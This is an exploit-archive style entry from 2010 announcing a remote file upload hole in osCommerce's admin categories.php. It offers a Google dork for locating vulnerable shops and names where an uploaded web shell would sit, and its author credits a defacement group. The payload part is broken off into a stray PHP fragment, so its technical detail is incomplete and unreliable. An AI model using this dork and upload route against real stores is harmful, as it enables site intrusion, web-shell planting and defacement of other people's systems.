# Exploit Title: [oscommerce remote upload from categories.php] # Google Dork: ["powered by oscommerce"] # Date: [20-November-2010] # Author: [Number 7] #Contact: {an[dot]7[at]live[dot]fr} # Software Link: [http://www.oscommerce.com/solutions/downloads] # Tested on: [windows-linux-FreeBSD-Solaris] exploit: Number 7
Discovered By Number 7
(best defacer kairouan tunisia 2010)
Oscommerce script: Remote File Upload in /admin/Categories.php



shell here:
$host/$path/images/product_info.php"); ?>